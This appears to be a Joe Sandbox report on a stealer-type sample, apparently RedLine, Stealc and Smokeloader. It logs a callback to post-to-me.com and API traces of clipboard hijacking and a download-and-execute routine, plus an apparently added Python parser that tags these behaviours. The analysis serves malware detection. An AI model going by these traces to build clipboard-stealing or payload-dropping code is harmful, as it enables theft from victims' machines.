                                                          User-Agent: ShareScreen
                                                          Host: post-to-me.com
2024-10-26 17:08:32 UTC | 771 | IN | HTTP/1.1 200 OK
                                                          Date: Sat, 26 Oct 2024 17:08:32 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/5.4.16
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zQlUiv2jtPwlSQ%2B8ylAomKIj3BtfVTljISapDZv6Fka8BN7LQW2lew9UZXQD9Emu72zXsOCvIMYTGHB5mjG1mNAIupVu05OJMhOvsciYUVEAD1PDOQ8PI5LLsl5dHTkoBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d8c0c85fee02e51-DFW
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=728&delivery_rate=2659320&cwnd=251&unsent_bytes=0&cid=8b4e90d6cf25d2d3&ts=547&x=0"
2024-10-26 17:08:32 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
2024-10-26 17:08:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0



Target ID: 0
Start time: 13:08:25
Start date: 26/10/2024
Path: C:\Users\user\Desktop\GK059kPZ5B.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\GK059kPZ5B.exe"
Imagebase: 0x400000
File size: 465'920 bytes
MD5 hash: 9883FDABD29A18139BD1CADEDF550F35
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

Target ID: 2
Start time: 13:08:34
Start date: 26/10/2024
Path: C:\Users\user\AppData\Local\Temp\A865.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
Imagebase: 0x400000
File size: 402'432 bytes
MD5 hash: 8107C38AF897D81AA4BFE8CE9CA8407C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 5
Start time: 13:08:41
Start date: 26/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
Imagebase: 0x400000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.5%
Dynamic/Decrypted Code Coverage: 3.7%
Signature Coverage: 5.7%
Total number of Nodes: 761
Total number of Limit Nodes: 21
                                                            execution_graph 65169 869005 65170 869009 65169->65170 65173 869736 65170->65173 65174 869745 65173->65174 65177 869ed6 65174->65177 65178 869ef1 65177->65178 65179 869efa CreateToolhelp32Snapshot 65178->65179 65180 869f16 Module32First 65178->65180 65179->65178 65179->65180 65181 869f25 65180->65181 65182 869735 65180->65182 65184 869b95 65181->65184 65185 869bc0 65184->65185 65186 869bd1 VirtualAlloc 65185->65186 65187 869c09 65185->65187 65186->65187 65187->65187 65188 404bb3 65189 404bbf Concurrency::details::ContextBase::CancelStealers 65188->65189 65194 40fb31 65189->65194 65193 404bdf ListArray Concurrency::details::ContextBase::CancelStealers 65196 40fb36 65194->65196 65197 404bc8 65196->65197 65199 40fb52 Concurrency::details::_RegisterConcRTEventTracing 65196->65199 65218 42ad9e 65196->65218 65225 42f470 7 API calls 2 library calls 65196->65225 65202 4051f5 65197->65202 65226 42862d RaiseException 65199->65226 65201 4103ec 65203 405201 Concurrency::details::ContextBase::CancelStealers __Cnd_init 65202->65203 65206 405219 __Mtx_init 65203->65206 65237 40ce57 28 API calls std::_Throw_Cpp_error 65203->65237 65205 405240 65229 4010ea 65205->65229 65206->65205 65238 40ce57 28 API calls std::_Throw_Cpp_error 65206->65238 65212 40528f 65213 4052a4 ListArray 65212->65213 65240 401128 30 API calls 2 library calls 65212->65240 65241 401109 65213->65241 65217 4052c9 Concurrency::details::ContextBase::CancelStealers 65217->65193 65223 4336c7 __dosmaperr 65218->65223 65219 433705 65228 42eae9 20 API calls __dosmaperr 65219->65228 65220 4336f0 RtlAllocateHeap 65222 433703 65220->65222 65220->65223 65222->65196 65223->65219 65223->65220 65227 42f470 7 API calls 2 library calls 65223->65227 65225->65196 65226->65201 65227->65223 65228->65222 65245 40d338 65229->65245 65232 401103 65234 40cf18 65232->65234 65277 42e134 65234->65277 65237->65206 65238->65205 65239 40ce57 28 API calls std::_Throw_Cpp_error 
65239->65212 65240->65212 65242 401115 __Mtx_unlock 65241->65242 65243 401122 65242->65243 65609 40ce57 28 API calls std::_Throw_Cpp_error 65242->65609 65243->65217 65249 40d092 65245->65249 65248 40ce57 28 API calls std::_Throw_Cpp_error 65248->65232 65250 40d0e8 65249->65250 65251 40d0ba GetCurrentThreadId 65249->65251 65252 40d0ec GetCurrentThreadId 65250->65252 65255 40d112 65250->65255 65256 40d0c5 GetCurrentThreadId 65251->65256 65263 40d0e0 65251->65263 65262 40d0fb 65252->65262 65253 40d1ab GetCurrentThreadId 65253->65262 65254 40d202 GetCurrentThreadId 65254->65263 65255->65253 65258 40d132 65255->65258 65256->65263 65274 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65258->65274 65261 4010f6 65261->65232 65261->65248 65262->65254 65262->65263 65267 40f8f4 65263->65267 65264 40d16a GetCurrentThreadId 65264->65262 65265 40d13d __Xtime_diff_to_millis2 65264->65265 65265->65262 65265->65263 65265->65264 65275 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65265->65275 65268 40f8fd 65267->65268 65269 40f8ff IsProcessorFeaturePresent 65267->65269 65268->65261 65271 40f972 65269->65271 65276 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65271->65276 65273 40fa55 65273->65261 65274->65265 65275->65265 65276->65273 65278 42e141 65277->65278 65279 42e155 65277->65279 65300 42eae9 20 API calls __dosmaperr 65278->65300 65291 42e0eb 65279->65291 65282 42e146 65301 42a5bd 26 API calls _Deallocate 65282->65301 65285 42e16a CreateThread 65286 42e189 GetLastError 65285->65286 65290 42e195 65285->65290 65329 42dfe0 65285->65329 65302 42eab3 20 API calls 2 library calls 65286->65302 65288 40527c 65288->65212 65288->65239 65303 42e05d 65290->65303 65311 434d4a 65291->65311 65295 42e104 65296 42e123 65295->65296 65297 42e10b GetModuleHandleExW 65295->65297 65298 42e05d __Thrd_start 22 API calls 65296->65298 65297->65296 65299 42e12d 65298->65299 65299->65285 65299->65290 65300->65282 65301->65288 
65302->65290 65304 42e06a 65303->65304 65305 42e08e 65303->65305 65306 42e070 CloseHandle 65304->65306 65307 42e079 65304->65307 65305->65288 65306->65307 65308 42e088 65307->65308 65309 42e07f FreeLibrary 65307->65309 65310 43348a _free 20 API calls 65308->65310 65309->65308 65310->65305 65312 434d57 65311->65312 65313 434d97 65312->65313 65314 434d82 HeapAlloc 65312->65314 65318 434d6b __dosmaperr 65312->65318 65327 42eae9 20 API calls __dosmaperr 65313->65327 65315 434d95 65314->65315 65314->65318 65317 42e0fb 65315->65317 65320 43348a 65317->65320 65318->65313 65318->65314 65326 42f470 7 API calls 2 library calls 65318->65326 65321 433495 HeapFree 65320->65321 65325 4334be _free 65320->65325 65322 4334aa 65321->65322 65321->65325 65328 42eae9 20 API calls __dosmaperr 65322->65328 65324 4334b0 GetLastError 65324->65325 65325->65295 65326->65318 65327->65317 65328->65324 65330 42dfec _Atexit 65329->65330 65331 42dff3 GetLastError ExitThread 65330->65331 65332 42e000 65330->65332 65345 431efa GetLastError 65332->65345 65334 42e005 65365 435591 65334->65365 65337 42e01b 65372 401169 65337->65372 65346 431f10 65345->65346 65347 431f16 65345->65347 65380 435131 11 API calls 2 library calls 65346->65380 65349 434d4a __dosmaperr 20 API calls 65347->65349 65352 431f65 SetLastError 65347->65352 65350 431f28 65349->65350 65351 431f30 65350->65351 65381 435187 11 API calls 2 library calls 65350->65381 65354 43348a _free 20 API calls 65351->65354 65352->65334 65356 431f36 65354->65356 65355 431f45 65355->65351 65357 431f4c 65355->65357 65358 431f71 SetLastError 65356->65358 65382 431d6c 20 API calls __dosmaperr 65357->65382 65383 42df9d 167 API calls 2 library calls 65358->65383 65361 431f57 65363 43348a _free 20 API calls 65361->65363 65362 431f7d 65364 431f5e 65363->65364 65364->65352 65364->65358 65366 4355b6 65365->65366 65367 4355ac 65365->65367 65384 434eb3 5 API calls 2 library calls 65366->65384 65369 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 
65367->65369 65370 42e010 65369->65370 65370->65337 65379 4354c4 10 API calls 2 library calls 65370->65379 65371 4355cd 65371->65367 65385 405825 65372->65385 65398 40155a Sleep 65372->65398 65373 401173 65376 42e1b9 65373->65376 65577 42e094 65376->65577 65378 42e1c6 65379->65337 65380->65347 65381->65355 65382->65361 65383->65362 65384->65371 65386 405831 Concurrency::details::ContextBase::CancelStealers 65385->65386 65387 4010ea std::_Cnd_initX 35 API calls 65386->65387 65388 405846 __Cnd_signal 65387->65388 65389 40585e 65388->65389 65444 40ce57 28 API calls std::_Throw_Cpp_error 65388->65444 65391 401109 std::_Cnd_initX 28 API calls 65389->65391 65392 405867 65391->65392 65400 4016e3 65392->65400 65421 402a14 InternetOpenW 65392->65421 65395 40586e ListArray Concurrency::details::ContextBase::CancelStealers 65395->65373 65399 4016d9 65398->65399 65445 40fe0b 65400->65445 65402 4016ef Sleep 65446 40cc35 65402->65446 65405 40cc35 28 API calls 65406 401715 65405->65406 65407 40171f OpenClipboard 65406->65407 65408 401947 Sleep 65407->65408 65409 40172f GetClipboardData 65407->65409 65408->65407 65410 401941 CloseClipboard 65409->65410 65411 40173f GlobalLock 65409->65411 65410->65408 65411->65410 65416 40174c _strlen 65411->65416 65412 40cbec 28 API calls std::system_error::system_error 65412->65416 65413 40cc35 28 API calls 65413->65416 65415 4018d6 EmptyClipboard GlobalAlloc 65415->65416 65417 4018ef GlobalLock 65415->65417 65416->65410 65416->65412 65416->65413 65416->65415 65450 402e8b 167 API calls 2 library calls 65416->65450 65452 40cacb 26 API calls _Deallocate 65416->65452 65451 4269b0 65417->65451 65420 401909 GlobalUnlock SetClipboardData GlobalFree 65420->65416 65422 402a47 InternetOpenUrlW 65421->65422 65423 402bbc 65421->65423 65422->65423 65424 402a5d GetTempPathW GetTempFileNameW 65422->65424 65426 40f8f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65423->65426 65458 42a8ae 65424->65458 65428 402bcb 65426->65428 65437 40e790 
[Control-flow graph edge data (node/edge rendering output of the graph viewer) omitted. What the graph recovers at function level: the routine starting at 0x402a14 opens a file with CreateFileW, copies the download into it in an InternetReadFile/WriteFile loop, closes it, launches it with ShellExecuteExW and waits with WaitForSingleObject; 0x402c24 calls InternetOpenW and InternetOpenUrlW; 0x402bcd calls RegCreateKeyExW, RegSetValueExW and RegCloseKey; 0x4023ba is a window procedure (DefWindowProcW, PostQuitMessage); 0xa5003c is the unpacking stub (SetErrorMode, VirtualAlloc, PEB access, VirtualProtect, VirtualFree, LoadLibraryA); 0x40fc2b is CRT startup (GetStartupInfoW, GetModuleHandleW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter). The remaining nodes are CRT file, thread and locale helpers (CreateFileW, GetFileType, ReadFile, ReadConsoleW, SetFilePointerEx, DuplicateHandle, ExitThread, FreeLibraryAndExitThread, MultiByteToWideChar, WideCharToMultiByte, critical-section enter/leave).]

                                                            Control-flow Graph

                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                            • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                              • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                            • OpenClipboard.USER32(00000000), ref: 00401721
                                                            • GetClipboardData.USER32(00000001), ref: 00401731
                                                            • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                            • _strlen.LIBCMT ref: 0040174D
                                                            • _strlen.LIBCMT ref: 0040177C
                                                            • _strlen.LIBCMT ref: 004018C0
                                                            • EmptyClipboard.USER32 ref: 004018D6
                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                            • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                            • CloseClipboard.USER32 ref: 00401941
                                                            • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                            • String ID: i
                                                            • API String ID: 1583243082-3865851505
                                                            • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                            • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                            • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                            • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D

                                                            Control-flow Graph

                                                            APIs
                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                            • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                            • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                            • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                            • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                            • String ID: .exe$<$ShareScreen
                                                            • API String ID: 3323492106-493228180
                                                            • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                            • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                            • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                            • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00869EFE
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00869F1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 3374acbeb7efbd02cc1596fc2621e4d2db35c8ad62b51c486cf68c661be67ad6
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: BCF06231100715ABDB207BF9A88DB6A76ECFF49725F120529F686D54C0DBB0E8454661
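The three "APIs" blocks above (the clipboard routine at 0x4016EA, the download-and-execute routine at 0x402A37 and the module snapshot at 0x869EFE) are the parts of this report an analyst usually wants to turn into behaviour tags and concrete indicators without reading them by hand. The following is an added example, not code from Joe Sandbox or from the sample: a small Python parser for the bullet-line format used in these blocks, plus an ordered API-sequence matcher and a decoder for the argument values the report does resolve (CreateFileW access and disposition, the WaitForSingleObject timeout, the CreateToolhelp32Snapshot flags, the "based on PE" marker of the memory dump). The input strings are copies of the report lines above, abbreviated and labelled as constructed; the behaviour patterns and all function names are the example's own choices, not a Joe Sandbox API.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: lines copied (abbreviated) from the three "APIs" blocks of this report.
CLIPPER_APIS = """
• __EH_prolog3_GS.LIBCMT ref: 004016EA
• Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
  • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
• OpenClipboard.USER32(00000000), ref: 00401721
• GetClipboardData.USER32(00000001), ref: 00401731
• GlobalLock.KERNEL32(00000000), ref: 00401740
• EmptyClipboard.USER32 ref: 004018D6
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,00000000), ref: 004018E3
• SetClipboardData.USER32(00000001,00000000), ref: 00401916
• CloseClipboard.USER32 ref: 00401941
• Sleep.KERNEL32(000002C7), ref: 0040194C
"""
DROPPER_APIS = """
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
• InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
• ShellExecuteExW.SHELL32(?), ref: 00402B88
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
"""
TOOLHELP_APIS = """
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00869EFE
• Module32First.KERNEL32(00000000,00000224), ref: 00869F1E
• Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
"""

# One bullet line: optional "Part of subcall function X:", then Api.MODULE(args), ref: address
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@$?]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
PE_RE = re.compile(r"based on PE: (true|false)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # raw hex strings; "?" means the sandbox could not resolve the value
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when the line is "Part of subcall function"

def parse_api_block(text: str) -> List[ApiCall]:
    """Parse the bullet lines of a Joe Sandbox 'APIs' block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

def hexarg(call: ApiCall, index: int) -> Optional[int]:
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):   # missing or unresolved ("?") argument
        return None

def first(calls: List[ApiCall], api: str) -> Optional[ApiCall]:
    return next((c for c in calls if c.api == api), None)

def in_order(calls: List[ApiCall], pattern: Tuple[str, ...]) -> bool:
    """True if every API in pattern occurs in that order; unrelated calls may sit in between."""
    it = iter(c.api for c in calls)
    return all(any(api == want for api in it) for want in pattern)

BEHAVIOURS = {   # example's own patterns, chosen from the sequences visible in this report
    "clipboard_hijack": ("OpenClipboard", "GetClipboardData", "EmptyClipboard",
                         "SetClipboardData", "CloseClipboard"),
    "download_and_execute": ("InternetOpenW", "InternetOpenUrlW", "CreateFileW",
                             "InternetReadFile", "WriteFile", "ShellExecuteExW"),
    "module_enumeration": ("CreateToolhelp32Snapshot", "Module32First"),
}

def classify(calls: List[ApiCall]) -> List[str]:
    found = [name for name, pat in BEHAVIOURS.items() if in_order(calls, pat)]
    if "clipboard_hijack" in found and sum(c.api == "Sleep" for c in calls) >= 2:
        found.append("polling_loop")   # Sleep before and after the rewrite: a clipper loop
    return found

GENERIC_WRITE, CREATE_ALWAYS = 0x40000000, 2
TH32CS_FLAGS = ((0x1, "heaplist"), (0x2, "process"), (0x4, "thread"), (0x8, "module"), (0x10, "module32"))

def describe_dropper(calls: List[ApiCall]) -> dict:
    """Concrete indicators from the download-and-execute block."""
    info = {}
    opn = first(calls, "InternetOpenW")
    if opn and opn.args:
        info["user_agent"] = opn.args[0]
    info["drops_to_temp"] = bool(first(calls, "GetTempPathW") and first(calls, "GetTempFileNameW"))
    cf = first(calls, "CreateFileW")
    if cf:
        info["write_access"] = bool((hexarg(cf, 1) or 0) & GENERIC_WRITE)   # dwDesiredAccess
        info["create_always"] = hexarg(cf, 4) == CREATE_ALWAYS                # dwCreationDisposition
    wait = first(calls, "WaitForSingleObject")
    if wait:
        info["wait_ms"] = hexarg(wait, 1)
    return info

def snapshot_scope(calls: List[ApiCall]) -> Optional[str]:
    """Decode dwFlags of CreateToolhelp32Snapshot into TH32CS_* names."""
    snap = first(calls, "CreateToolhelp32Snapshot")
    flags = hexarg(snap, 0) if snap else None
    if flags is None:
        return None
    return "+".join(name for bit, name in TH32CS_FLAGS if flags & bit) or "none"

def in_pe_image(text: str) -> Optional[bool]:
    """From the 'Source File' line: True if the code sat inside the mapped PE, False if in other memory."""
    m = PE_RE.search(text)
    return None if not m else m[1] == "true"

if __name__ == "__main__":
    for name, text in (("clipper", CLIPPER_APIS), ("dropper", DROPPER_APIS), ("toolhelp", TOOLHELP_APIS)):
        print(name, classify(parse_api_block(text)), "in PE image:", in_pe_image(text))
    print(describe_dropper(parse_api_block(DROPPER_APIS)), snapshot_scope(parse_api_block(TOOLHELP_APIS)))
```

The ordered-subsequence match rather than an exact sequence is deliberate: the report interleaves helper calls (_strlen, GlobalLock, GetTempPathW) with the calls that carry the behaviour, and a contiguous match would miss the pattern. The "based on PE: false" check is the cheap way to notice that the Toolhelp32 snapshot is issued from memory outside the mapped image, which is consistent with the unpacking the report flags.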

                                                            Control-flow Graph

[Control-flow graph data for the function at 0x432f49 omitted (graph viewer rendering output). It is a CRT read helper: GetConsoleMode, ReadConsoleW, ReadFile and GetLastError, with the usual errno mapping via __dosmaperr.]
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                            • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                            • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                            • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                            • GetLastError.KERNEL32 ref: 0043D170
                                                            • __dosmaperr.LIBCMT ref: 0043D177
                                                            • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                            • GetLastError.KERNEL32 ref: 0043D18D
                                                            • __dosmaperr.LIBCMT ref: 0043D196
                                                            • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                            • CloseHandle.KERNEL32(?), ref: 0043D300
                                                            • GetLastError.KERNEL32 ref: 0043D332
                                                            • __dosmaperr.LIBCMT ref: 0043D339
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID:
                                                            • API String ID: 4237864984-0
                                                            • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                            • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                            • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                            • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00A5024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: a623cdb998c7220ef1d2bd35fd9a9c36a78486dd08d205d035a430f27bf863f3
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 10526974A01229DFDB64CF58C985BACBBB1BF09305F1480D9E94DAB251DB30AE89DF14

                                                            Control-flow Graph

                                                            APIs
                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
